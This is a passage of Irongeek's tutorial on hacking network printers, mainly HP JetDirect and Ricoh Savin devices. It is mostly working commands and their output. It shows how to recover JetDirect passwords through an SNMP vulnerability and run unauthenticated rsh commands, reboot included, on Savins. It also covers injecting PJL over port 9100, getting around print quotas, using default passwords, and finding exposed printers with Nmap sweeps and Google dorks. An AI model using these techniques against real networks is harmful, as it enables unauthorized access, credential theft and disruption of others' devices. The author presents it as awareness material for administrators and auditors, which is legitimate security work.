hacking network printers (m

Hacking etwork Printers(Mostly HP JetDirects, but a little info on the Ricoh Savins)

By Adrian "Irongeek" Crenshaw

Hack a printer you say, what kind of toner have you been smoking, Irongeek? Well, I'm here to tell you, there's

more that can be done with a printer to compromise network security than one might realize. In the olden days a

printer may not have been much of a concern other than the threat from folks dumpster diving for hard copies of the

documents that were printed from it, but many modern printers come network aware with embedded Operating

Systems, storage and full IP stacks. This article will attempt to point out some of the more interesting things that can

be done with a network based printer to make it reveal information about its users, owners and the network it's part

of.

Some of this article may seem a little Black-hat as it concentrates more on the breaking-in than the keeping-out.

However I feel this information will be useful to system administrators and auditors so that they know what sorts of

things to look out for when it comes to network printers. If you want more advice on how to lock down your network

printer visit your vendors web site. A guide from HP is linked at the bottom of this article for your convenience. If

nothing else, this article may get you thinking in the right direction.

For my tests I will mostly be using a Hewlett-Packard LaserJet 4100 MFP (Fax/Printer/Copier/Scanner), an HP

JetDirect 170x and a HP JetDirect 300X (J3263A) but I will also touch a bit on the Ricoh Savin series of printers lest

you think HPs are the only network printers with security problems.

Much of this article will read like a huge brain dump, sort of disorganized and hazy like my mind. It all started as

a project for Droop's Infonomicon TV and it snowballed from there with no specific direction. Bear with me as I clean

it up and other folks send me new additions and suggestions to make this article more useful.

The most recent version of this article can be found at: http://www.irongeek.com/i.php?page=security

/networkprinterhacking

Table of Contents:

Intro to the concepts

Diagnostics page

Stupid Printer Tricks

JetDirect password notes

Getting a JetDirect password remotely using the SNMP

vulnerability

Controlling the JetDirect box with telnet/web browser

RSH commands and Richo Savin Aficio Printers

Controlling the finding JetDirect boxes with JetAdmin

Finding Network printers using Nmap and SNMP tools

Finding info about the printer using SNMP tools

Finding Printers with Google

Using a JetDirect box as an Nmap Idlescan Zombie

Setting up a direct IP printer in Windows and Linux

Changing the LCD display text using HPhack, IGhphack

or Hijetter

Phenoelit's Hijetter and PFT

Setting the LCD Display with Hijetter

Changing settings with Hijetter

Using Hijetter to treat some JetDirect boxes as

files/web servers

Finding stored faxes and print jobs on Jetdirect

printers

Using IP ACLs to restrict access

Don't forget to look for Stored Documents via the web

interface

Coding your own scripts with PHP, Perl and PJL

Fixing a busted hard drive with Ghost

Sniffing print jobs and replaying them

A note on Plain-text authentication protocols

Other Ideas

Links to Tools

Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...

1 of 37 02/04/2009 08:17

Side note on a Pharos Uniprint vulnerability

Spamming Printers

DoSing the network or the printer

Media

Useful links for further research

Change Log

Intro to the concepts

There are several TLAs (Three letter acronyms) I will be using though out this article so I best get them out of

the way now. PCL stands for Printer Control Language, which was developed by HP and has become one of the most

common printer protocols. Another page description language you should be aware of is PostScript (PS) which was

designed by Adobe to allow for more complicated things to be printed from a plotter/printer. PJL (Printer Job

Language) is an extension of PCL that can tell a printer what to do, from changing device settings to transferring

files. There are also three major network printing protocols you should be aware of. Here's a table with some of the

pertinent information about each protocol:

ame Meaning Port

LPD Line Printer Daemon protocol 515/tcp

IPPaka

Berkeley printing system

Internet Printing Protocol 631/tcp

JetDirectaka

AppSocketaka

Rawaka

PDL-datastream

9100/tcp

Since my focus is on JetDirects I will mostly be talking about and using AppSocket/PDL-datastream, but since

many JetDirects can also work with IPP and LPD, and many non HP made network printers also use AppSocket, you

should be aware of the existence of all three. There's are also network printers that use the IPX, Appletalk and SMB

(some Savins for example) protocols to communicate. I'll not cover IPX and Appletalk because of my lack of

experience with them, maybe someone else who reads this page will submit some info on them for me to post (credit

will be given). SMB I may try to cover at a later time. Now that the formalities are out of the way, lets start playing

with printers.

Diagnostics page

The pictures above are of a external JetDirect

170x box. Notice the picture on the right; on the far

right hand side you will notice a little button labeled

"test". Pressing this button on most JetDirect boxes

will print out a diagnostic page listing statistics and

the IP setting for the JetDirect box. If your printer has


2 of 37 02/04/2009 08:17

an internal JetDirect card you will have to negotiate

the menus to find out how to print this diagnostics

page. Once you hit the test button the printer should

print out a page or two that lists information like host

name, MAC address, IP Address, subnet mask,

default gateway, firmware revision and some general

statistics. The IP/host name will be especially useful

if you want to bypass print quota software by setting

up direct IP printing on your Windows or Linux box.

If you don't have physical access to the JetDirect box

you can still find its IP or host name by seeing what

its port is listed as if that network printer has been

setup on a Windows box you have access to.

As you can see by the graphic on the left, the

host name for this JetDirect box is npib1002c.

Sometimes you will see a port listed as something like

IP_192.168.1.102, where obviously 192.168.1.102 is

the JetDirect's IP. You can pretty much use a host

name or an IP interchangeably on your LAN, and if the host name has a fully qualified domain name you should be

able to address it from the Internet as well.

If you don't have access to a JetDirect box, or if your PC is not connected to one, don't despair. In next few

sections I will describe how to find these printers on the LAN/Internet using Nmap and JetAdmin.

Stupid Printer Tricks

I called this section Stupid Printer Tricks because while these activities aren't very technical, they do illustrate the

simplicity of the RAW/AppSock protocol that listens on port 9100/tcp on JetDirects and most other network printers.

Try this, find your printers IP using the Diagnostics page then web surf to:

http://your-printers-ip:9100

The ":9100" at the end is there to tell your browser to connect on port 9100/tcp. When you try to establish the

connection you should notice that the browser does not go anywhere, this is because what's running on port 9100/tcp

is not a web server. Click the stop button on your browser to tell it to stop trying to connect then go take a look at the

printer. Depending on what browser you use you should see a print out something like one of the following:

Firefox Internet ExploiterGET / HTTP/1.1

Host: tux:9100

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;

rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text

/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

GET / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-

excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR

2.0.50727)

Host: test:9100

Connection: Keep-Alive

You see, anything that the printer sees coming in on port 9100/tcp it tries to read as a print job. The two texts

you see above are HTTP get requests for the root document of the server. The network printer does not understand

this and just tries to print the request out as text. Another thing you can try is telneting to port 9100 (we will assume

your printer's IP is 192.168.1.2), typing in some text, and seeing it print:

Irongeek:~# telnet 192.168.1.2 9100Trying 192.168.1.2...Connected to 192.168.1.2.Escape character is '^]'.hello printer


3 of 37 02/04/2009 08:17

^]telnet> quitConnection closed.Irongeek:~#

You should now see a print out that just has the words "hello printer" on it. The "^]" represents the pressing of

the Control key and the ] bracket at the same time. The above example was done in *nix, but the same commands

should work in Windows. Keep in mind you may not see all of what you type in (the parts in red) unless you have

local echo turned on (which seems to be off by default in Windows).

There are exceptions to network printers just printing out everything sent to port 9100. This trick, for which

there will be more details given later, should change LCD display to say what you want. It's not supported on all

printers, but If you have an HP it should work. I've got to thank Dipswitch for pointing out that you don't need fancy

tools or code to do it (but the tools do make it easier).

With Telnet:

Irongeek:~#$ telnet 192.169.1.2 9100@PJL RDYMSG DISPLAY="Some Text"^]quitIrongeek:#$

Or Netcat:

Irongeek:~#$ echo @PJL RDYMSG DISPLAY=\"Some Text\" | netcat -q 0 192.168.1.2 9100Irongeek:#$

JetDirect password notes

Most of the time folks never even turn the JetDirect's password options on, but if they do they quickly find that

they don't always work in logical ways.

If you are using a newer JetDirect box like one of the following:

680N (J6058A)

615N (J6057A)

610N (J4169A, J4167A)

380X (J6061A)

310X (J6038A,250M (J6042A)

75X(J6035A

or an HP printer with and internal JetDirect card like:

HP LaserJet 4100 series



HP Color LaserJet 4550 series

HP Color LaserJet 4600

HP Designjet 5000 series or HP Business Inkjet 2600

then the telnet and device password used by the Web interface and JetAdmin software are the same. If you telnet in

you will be prompted for a user name and password. The user names "root", "admin", "administrator" and

"supervisor" are all valid and equivalent.

If you are using an older JetDirect box like one of the following:

600N (J3110A, J3111A, J3112A, J3113A)

400N (J4100A, J4105A, J4106A)

300X


4 of 37 02/04/2009 08:17

500X

170X(J3296A, J4101B, J3263A, J3264A, 3265A, J4102B, J3258B)

then things are more confusing. First, if you telnet in you will only be prompted for a password; no user name is asked

for. If you setup a password for the telnet service it may not be the same password for the web interface, and vice

versa. In other words there are two passwords on at least some JetDirect boxes, one for telneting into it and one for

the web interface/JetAdmin software. Telnet password are case sensitive but Web/JetAdmin passwords are not.

Telnet passwords are limited to 16 characters, Web/JetAdmin passwords to 12. Just so you know, Hijetter (discussed

later) may report the password as disabled even if both passwords are set, but that's ok since it bypasses passwords

anyway.

The Web interface and JetAdmin use SNMP (Simple Network Management Protocol) to control the JetDirect

boxes and require that you know the password, but I've read that other third party SNMP configuration utilities will

just ignore the password altogether and can connect and control the JetDirect anyway. It might be a good idea for

some to change their SNMP community names to something other than the default public/private, but even if they do

they could still be sniffed off of the wire unless they have a more recent JetDirect that supports SNMPv3 and

SSL/TLS.

If you use the JetAdmin for Window 2000 desktop software be aware that it automatically stores passwords in

the registry once you use it. For example, if the MAC address of a JetDirect box was 001083A2C913 then JetAdmin

would store the password "password" in User\Software\Hewlett-Packard\HP JetAdmin\DeviceOptions

\001083A2C913 in a value called "Access" as "50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00". In case you

don't notice it, this HEX string is the password "password" converted to all uppercase, with each letter turned to it's

HEX equivalent, with a null character between each password character, and then null padded.

Brute forcing these passwords might be an option since logging on many network printers isn't all that involved.

As you already know telnet is unencrypted so sniffing those passwords is trivial. As I found by sniffing with Ethereal,

the web interface on older Jetdirects (really a Java applet) and JetAdmin use SNMP to configure the JetDirect box

and also pass their password as plain text. Look for the password just before the string "=108" in the dumps. Some

newer Jetdirects don't do this, and can use SSL to encrypt the connection.

If you set a password on a JetDirect box while you are playing around with it and forget what it is, all you have

to do is a hard reset. Unplug the power cord, hold down the test/status button, and while still holding the button plug

the power back in. The password and all of the other settings should now be cleared.

Getting a JetDirect password remotely using the SMP vulnerability

I was cruising around SecurityFocus.com looking for JetDirect exploits and I came across a dooze:

http://www.securityfocus.com/bid/7001/exploit

Since the link above is rather shy on details I'll show you the exploit step by step. It seems that the device

password for many JetDirects is stored in almost plain text and is accessible via SNMP using the read community

name. Most folks leave their SNMP community name as "public" but even it has been change it's likely sniffable.

Also try "internal" as the community name as this is the default write community name on many JetDirects. Reports

are that on some JetDirects , even if you change the community name, "internal" will still work. With the Net-SNMP

toolset the password is easy to recover:

Irongeek:~# snmpget -v 1 -c public 192.168.2.46 .1.3.6.1.4.1.11.2.3.9.1.1.13.0SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 = Hex-STRING: 50 41 53 53 57 4F 52 44 3D 31 30 38 3B 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Irongeek:~#


5 of 37 02/04/2009 08:17

Notice the hex string. In Hex 50=P,41=A,53=S,53=S,57=W,4F=0,52=R,44=D,3D==,31=1,30=0,38=8,3B=;

In other words, "PASSWORD=108;" which means the password is "PASSWORD". I also tried it after changing the

password to newpassword, and likewise "50 41 53 53 57 4F 52 44 3D 31 30 38 3B" is "NEWPASSWORD=108;".

Anything before the "=108;" is the password. For those too lazy to do the HEX to ASCII conversion themselves

check out:

http://nickciske.com/tools/hex.php

Also note that I entered my passwords in lowercase, but they were stored in uppercase. These passwords are case

insensitive. Some of the vulnerable JetDirects are:

HP JetDirect J3263A

HP JetDirect J3113A

HP JetDirect J3111A

Other JetDirects may also be v\erle, so it's worth testing. I tried it with my Hewlett Packard HP JetDirect 300X

(J3263A) and installing the latest firmware (H.08.49) seems to fix this problem but I imagine there are still a lot of

un-patched JetDirects out there. Some print servers like the HP J3258A JetDirect 170X do not have user upgradeable

firmware at all so you are stuck with the firmware they were shipped with. The only way to fix the vulnerability on

them is to by a new JetDirect.

Controlling the JetDirect box with telnet/web browser

Most JetDirect boxes can be configured with a web browser or via a telnet session. Below you will see a screen

show of the web base configuration tool. Just type the IP or host name of the JetDirect box into the address bar of

your favorite Java enable web browser and it should work.

Here is an example of connecting to a JetDirect box with a telnet session, bringing up the help screen and


6 of 37 02/04/2009 08:17

resetting the host name:

Irongeek:~# telnet 192.168.1.2Trying 192.168.1.2...Connected to 192.168.1.2.Escape character is '^]'.

HP JetDirect

Please type "?" for HELP, or "/" for current settings> ?

To Change/Configure Parameters Enter:Parameter-name: value <Carriage Return>

Parameter-name Type of valueip: IP-address in dotted notationsubnet-mask: address in dotted notation (enter 0 for default)default-gw: address in dotted notation (enter 0 for default)syslog-svr: address in dotted notation (enter 0 for default)idle-timeout: seconds in integersset-cmnty-name: alpha-numeric string (32 chars max)host-name: alpha-numeric string (upper case only, 32 chars max)dhcp-config: 0 to disable, 1 to enableallow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)deleterawport: <TCP port num>listrawport: (No parameter required)

addstring: <name> <contents>contents - For non-printable characters use\xx for two digit hex numberdeletestring: <name>liststring: (No parameter required)addq: <name> [prepend] [append] [processing]prepend - The prepend string nameappend - The append string nameUse NULL for no stringprocessing - RAW, TEXT, or AUTOdeleteq: <name>listq: (No parameter required)defaultq: <name>

ipx/spx: 0 to disable, 1 to enabledlc/llc: 0 to disable, 1 to enableethertalk: 0 to disable, 1 to enablebanner: 0 to disable, 1 to enable

Type passwd to change the password.

Type "?" for HELP, "/" for current settings or "quit" to save-and-exit.Or type "exit" to exit without saving configuration parameter entries> /

===JetDirect Telnet Configuration===Firmware Rev. : H.08.32MAC Address : 00:60:b0:6d:47:c6Config By : DHCP

IP Address : 192.168.1.2Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : Not SpecifiedHost Name : NPI6D47C6

DHCP Config : EnabledPasswd : DisabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : Enabled> host-name:BUTTMONKEY> /


7 of 37 02/04/2009 08:17

===JetDirect Telnet Configuration===Firmware Rev. : H.08.32MAC Address : 00:60:b0:6d:47:c6Config By : DHCP

IP Address : 192.168.1.2Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : Not SpecifiedHost Name : BUTTMONKEY

DHCP Config : EnabledPasswd : DisabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : Enabled> quit

===JetDirect Parameters Configured===

IP Address : 192.168.1.2Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : Not SpecifiedHost Name : BUTTMONKEY

DHCP Config : EnabledPasswd : DisabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : EnabledUser QuittingConnection closed by foreign host.Irongeek:~#

Important note about using telnet to configure a JetDirect box: You must use the "quit" command to end

your session if you want your changes to be saved. If you just kill the telnet terminal all of the changes you made

during the session will be lost.

RSH commands and Richo Savin Aficio Printers

I've got to thank Mslaviero for introducing me to this aspect of Richo Savin printers. Check out his site:

http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/

Normally you might want to login to your Savin with telnet, but it's likely password protected (the default

password is "password" on some Savins). Don't fear, there is another way you may be able to execute some

commands on the printer. You may have noticed from an Nmap scan that your Richo Savin has port 514/tcp open.

Guess what? You can use the rsh *nix utility to execute commands remotely on the box. First you will want to make

sure you have the rsh client installed. Rsh has largely been depreciated because of it's unencrypted connections and

other security problems. If you try rsh on you Linux box it will likely try to use SSH automatically instead, which

won't work. If you have a Debian based distribution install rsh-client (apt-get install rsh-client) and try out some of

these commands to gather more information from your Savin printer:

The Info command will list the printers current configuration and supported options"

root@Irongeek:~# rsh 192.168.1.2 info(Input Tray)No. Name Page Size Status-------------------------------------------------------------------------------1 Tray 1 11 x 8 1/2" PaperEnd.2 Tray 2 11 x 8 1/2" Normal.3 LCT 11 x 8 1/2" Normal.4 Bypass Tray 11 x 8 1/2" PaperEnd.


8 of 37 02/04/2009 08:17

(Output Tray)No. Name Status------------------------------------------------------------------------1 Internal Tray 1 Normal.2 Finisher Upper Tray Normal.3 Finisher Shift Tray Normal.

(Printer Language)No. Name Version--------------------------------------------------------1 Automatic Language Switching 2.21.5.32 Customized PJL 2.21.5.33 RPCS 2c.9.5a4 PCL 5e Emulation 1.015 PCL XL Emulation 1.016 Adobe PostScript 3 1.02

Stats gives you system stats (duh) :

root@Irongeek:~# rsh 192.168.1.2 statPrinter status : Printing.(Ready.)Online/Offline : Online.

Rank Owner Job Files Total Sizeactive anonymous 2491 (standard input) 126980 bytes

The syslog command will return information such as the version, wins server of the network, what daemons were

started and other bits of info:

root@Irongeek:~# rsh 192.168.1.2 syslog#[ncsd(17)]06/02/24 07:16:18 RICOH Aficio 2045e 2.40 INFO:#[ncsd(17)]06/02/24 07:16:18 Network Control Service 4.12 INFO:#[ncsd(17)]06/02/24 07:16:18 Copyright (C) 1994-2002 RICOH CO.,LTD. INFO:#[ncsd(17)]06/02/24 07:16:19 Ethernet started with IP: 192.168.1.2 INFO:#[inetd(42)]06/02/24 07:16:19 inetd start. INFO:#[snmpd(43)]06/02/24 07:16:19 Snmpd Start. INFO:#[httpd(44)]06/02/24 07:16:19 httpd start. INFO:#[ncsd(17)]06/02/24 07:16:19 Current Interface Speed : 100Mbps(full-duplex) INFO:#[nbtd(45)]06/02/24 07:16:19 nbtd start. INFO:#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=RNP82398B (Ethernet) INFO:#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=IGPrinter (Ethernet) INFO:#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=WORKGROUP (Ethernet) INFO:#[multid(48)]06/02/24 07:16:21 multid start. INFO:#[diprintd(51)]06/02/24 07:16:21 started. INFO:#[lpd(52)]06/02/24 07:16:21 restarted INFO:#[snmpd(43)]06/02/24 07:16:28 Snmp over ip is ready. INFO:#[httpd(44)]06/02/24 07:16:28 ipp enable. INFO:#[httpd(44)]06/02/24 07:16:28 nrs disable. INFO:#[lpd(52)]06/03/06 22:19:28 bad request (71) from WARNING:#[lpd(52)]06/03/06 22:19:28 Illegal service request ERR:#[lpd(52)]06/03/06 22:19:28 Lost connection ERR:#[rshd(2570)]06/03/06 22:19:33 192.168.19.56 can't connect second port: 65360 INFO:#[rshd(2596)]06/03/06 22:50:32 (192.168.19.56) help: Command not supported. ERR:

Prnlog give you more information on recently print documents:

root@Irongeek:~# rsh 192.168.1.2 prnlogID User Page Result Time--------------------------------------------------------2472 2 Finished 06/03/06 21:292473 10 Finished 06/03/06 21:332474 1 Finished 06/03/06 21:582475 19 Finished 06/03/06 21:592476 3 Finished 06/03/06 22:162477 4 Finished 06/03/06 22:162478 2 Finished 06/03/06 22:172479 4 Finished 06/03/06 22:192480 5 Finished 06/03/06 22:222481 3 Finished 06/03/06 22:242482 2 Finished 06/03/06 22:292483 2 Finished 06/03/06 22:352484 1 Finished 06/03/06 22:372485 2 Finished 06/03/06 22:382486 2 Finished 06/03/06 22:382487 2 Finished 06/03/06 22:402488 6 Finished 06/03/06 22:402489 2 Finished 06/03/06 22:452490 4 Finished 06/03/06 22:522491 30 Finished 06/03/06 22:53

Ps will list the currently running processes:


9 of 37 02/04/2009 08:17

root@Irongeek:~# rsh 192.168.1.2 pspid=2605 [rshd]pid= 57 [pcl]pid= 55 [rsp]pid= 52 [lpd]pid= 51 [diprintd]pid= 49 [centrod]pid= 48 [multid]pid= 47 [gps-web]pid= 46 [gps-pm]pid= 45 [nbtd]pid= 44 [httpd]pid= 43 [snmpd]pid= 42 [inetd]pid= 41 [mcsc]pid= 40 [meu]pid= 38 [plotter_sa]pid= 36 [shmlog]pid= 35 [copy]pid= 34 [gps]pid= 33 [scan]pid= 32 [nfa]pid= 31 [wdb]pid= 30 [pts]pid= 29 [websys]pid= 23 [nrs]pid= 21 [dcs]pid= 19 [ous]pid= 18 [ucs]pid= 17 [ncsd]pid= 16 [ecs]pid= 15 [mcs]pid= 14 [fcuh]pid= 13 [scs]pid= 12 [imh]pid= 3 [checker]pid= 2 [pagedaemon]pid= 1 [init]pid= 0 [swapper]

The the print command prints whatever you tell it to on a sheet of paper (in this case just the word "test"):

root@Irongeek:~# rsh 192.168.1.2 printtestroot@Irongeek:~#

Also try "rsh ip-address reboot" to see if you can reset the printer remotely (check syslog to see if it worked.

Much the same information can be obtain by downloading files from the Savin printer's built in FTP server and

reading them in a text editor. See the screen shot below:


10 of 37 02/04/2009 08:17

Controlling and finding JetDirect boxes with JetAdmin

A nice tool Hewlett-Packard puts out for controlling JetDirect boxes is JetAdmin. Currently HP only offers a

web version of the software, called appropriately enough Web JetAdmin, with versions for both Windows and Linux.

Unfortunately you have to register on HP's site to get it, but you can download it without registering from this mirror

site:

http://www.svrops.com/svrops/dwnldprog.htm

Personally I prefer the older HP JetAdmin for Window 2000 (v3.42, the last version to be released before it was

discontinued but still works fine with XP) as it seems quicker and less bloated; however it may be missing some of the

features of the newer Web JetAdmin. You can download the desktop version from:

http://www.helpdesk.umd.edu/os/windows_nt/printing/674/

JetAdmin is very fast at finding

JetDirect boxes on your subnet since it

does an SNMP broadcast to the network to

locate them. Just right click and choose

"Properties" to find more information about

the JetDirect box, or choose "Modify" to

bring up a wizard that lets you change the

description, IP settings and other variables

associated with the printer.

JetAdmin can also generate reports

about the network printers it finds.

JetAdmin can do too many things for me to

describe them all in details here so go

download it and try it out.

As a side note, if you want to find

boxes on a network running Web JetAdmin

,do a ports scan for 8000/tcp (HTTP) and

8443/tcp (HTTPS); if it's password is weak

or non-existent it's an easy way to control a

network's printers. If you are interested in a JetAdmin like tool for the Ricoh Savin printers look into

SmartDeviceMonitor.

Finding etwork printers using map and SMP tools

Using Nmap from your Linux (preferable) or Windows box makes finding JetDirects and other network printers

pretty easy. The Nmap commands I will be showing in this section are very simple and not very stealthy so you may

want to consult the Nmap MAN page or a good Nmap tutorial for more ideas. You could use a simple Nmap

command like:

nmap -A 192.168.1.*

to scan the range 192.168.1.1-255 for common ports and do an OS and version detect on the systems it finds. The

output of the above command would look something like the following:

Irongeek:~# nmap -A 192.168.1.*


11 of 37 02/04/2009 08:17

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 15:12 EDTInteresting ports on igprinter (192.168.1.93):(The 1656 ports scanned but not shown below are in state: closed)PORT STATE SERVICE VERSION21/tcp open ftp HP JetDirect ftpd23/tcp open telnet?80/tcp open http HP Jetdirect httpd280/tcp open http HP Jetdirect httpd515/tcp open sdmsvc LANDesk Software Distribution (sdmsvc.exe)631/tcp open http HP Jetdirect httpd9100/tcp open jetdirect?Device type: printer|print serverRunning: HP embeddedOS details: HP LaserJet printer/print server

Nmap finished: 1 IP address (1 host up) scanned in 120.963 secondsIrongeek:~#

There's one problem with the simple command shown above. If you are using a version of Nmap before 3.90 on

some network printers it will create garbage print jobs with text like:

GET / HTTP/1.0

OPTIONS / HTTP/1.0

OPTIONS / RTSP/1.0

on each of the sheets printed, wasting a lot of paper. This happens because as Nmap scans for version detection on

port 9100/tcp it sends some of the probe requests from the nmap-service-probes file to figure out what service is

running on port 9100/tcp. Since the JetDirect box does not understand what it's being sent it just prints out the probes

and you wind up with a bunch of garbage printed out. The easiest way to fix this is to upgrade to Nmap 3.90 or better,

but barring that, there is a workaround. A better and faster solution might be to only probe for common network

printer ports other than 9100 (Note: You may want to leave off -T insane for stealth/bandwidth reasons):

nmap -A -p 21,23,80,280,515,631 192.168.1.* -T insane

or maybe not use the -A (which is like doing a -sV -sO together) option at all and just use -sO to detect the OS that's

running, but not send probes to the ports to find out the service versions are running.

While we are at it, it might be interesting to run a UDP scan on the JetDirect box as well.

Irongeek:~# nmap -sU 192.168.1.*

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-11 06:21 EDTInteresting ports on 192.168.1.93:(The 1474 ports scanned but not shown below are in state: closed)PORT STATE SERVICE137/udp open|filtered netbios-ns161/udp open|filtered snmp427/udp open|filtered svrloc32768/udp open|filtered omadMAC Address: 00:60:B0:6D:47:C6 (Hewlett-packard CO.)


As you can see we found quite a few ports to look into. I'll go over some of the things you can do with them in a

bit. By the way, you may notice the NMB port 137/udb is open, which means you may be able to find printers on the

LAN via the NetBIOS name service.

By the way, to find Ricoh Savins on the network you could use an Nmap command something like the following:

Irongeek:/# nmap -A 192.168.1.3 -T insane

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-09 23:49 EDTInteresting ports on 192.168.1.3:(The 1656 ports scanned but not shown beloware in state: closed)


12 of 37 02/04/2009 08:17

PORT STATE SERVICE VERSION21/tcp open ftp23/tcp open telnet?80/tcp open http?514/tcp open shell?515/tcp open printer lpd (error: Illegalservice request)631/tcp open ipp?9100/tcp open jetdirect?5 services unrecognized despite returning data.If you know the service/version, please submitthe following fingerprints athttp://www.insecure.org/cgi-bin/servicefp-submit.cgi :==============NEXT SERVICE FINGERPRINT (SUBMITINDIVIDUALLY)==============

...Omitted for security and space

reasons...MAC Address: 00:00:74:80:7C:B8 (Ricoh Company)Device type: general purposeRunning: NetBSDOS details: NetBSD 1.3I through 1.6Uptime 6.506 days (since Sat Sep 3 11:42:372005)

Nmap finished: 1 IP address (1 host up) scannedin 94.690 secondsIrongeek:/#

Notice that the Ricoh Savins have a lot of the same ports open as the HP JetDirects, but that the the OS is

detected as NetBSD (it will even run on your toaster).

Since many network printers respond to SNMP another great way to find them is to use an SNMP service scanning

tool. Ricoh puts out a good tool for finding and configuring many network printers called SmartDeviceMonitor.

SmartDeviceMonitor seems to miss some network printers that aren't Savins, but if you use Richo Savin Aficio

printers on your network its a great tool for locating and polling them.

http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=

19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=

Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA

Foundstone's SNScan in another good choice:

http://www.foundstone.com/resources/proddesc/snscan.htm


13 of 37 02/04/2009 08:17

or Softperfect's NetScan if you turn on the SNMP search options:

http://www.softperfect.com/products/networkscanner/

Another third way you could find network printers (if you are on the same subnet) is to use Nmap or Cain to do

an ARP sweep and look for and boxes with a MAC address belonging to Hewlett Packard, Ricoh or another printer

vendor. These are likely network printers.


14 of 37 02/04/2009 08:17

Finding Printers with Google

Sometimes for convenience admins will put links to there printers' web interfaces on an Intranet site so they can

easily admin them or pull off stored documents. Well, sometimes an Intranet is not really just an Intranet but

accessible via the Internet. Google is a great way to find these printers. Here are a few search strings that may be of

interest:

Ricoh Savins (Since these printer frequently store documents where to can be downloaded this can be a real killer for

security)

intitle:"web image monitor"

"/web/user/en/websys/webArch/mainFrame.cgi"

inurl:"/en/sts_index.cgi"

HP Jetdirects (Varies greatly from model to model)

inurl:hp/device/this.LCDispatcher

CUPS Connected Printers

inurl:":631/printers" -php -demo

Try combining the above with the Google "site:" parameter to restrict the search to just certain organizations.

For more information on Google Hacking visit http://johnny.ihackstuff.com and search their database of useful

Google search strings for "Printers". I obtained some of the above search strings from Johnny's site.

Finding info about the printer using SMP tools

Using the tools from http://net-snmp.sourceforge.net on a Linux box can yield a great deal of information about

a network, assuming no firewalls are blocking the SNMP port (161/udp). The greatly truncated output below should

give you some idea as to the kind of information you can get using snmpwalk, including other hosts on the same

network, their IPs and MAC addresses and the features of the printer along with it's firmware revision. If you are

using a Debian based distribution on Linux try the "apt-get install snmp" command to get these tools.

root@Cthulhu:~# snmpwalk -v 1 -c public 192.168.1.2

SNMPv2-MIB::sysDescr.0 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49

SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.11.2.3.9.1

SNMPv2-MIB::sysUpTime.0 = Timeticks: (1358074910) 157 days, 4:25:49.10


15 of 37 02/04/2009 08:17

SNMPv2-MIB::sysContact.0 = STRING:

SNMPv2-MIB::sysName.0 = STRING: NPI6D47C6

SNMPv2-MIB::sysLocation.0 = STRING:

SNMPv2-MIB::sysServices.0 = INTEGER: 64

IF-MIB::ifNumber.0 = INTEGER: 1

IF-MIB::ifIndex.1 = INTEGER: 1

IF-MIB::ifDescr.1 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49

IF-MIB::ifType.1 = INTEGER: ethernetCsmacd(6)

...Omitted for security and space reasons...

IF-MIB::ifOutQLen.1 = Gauge32: 0

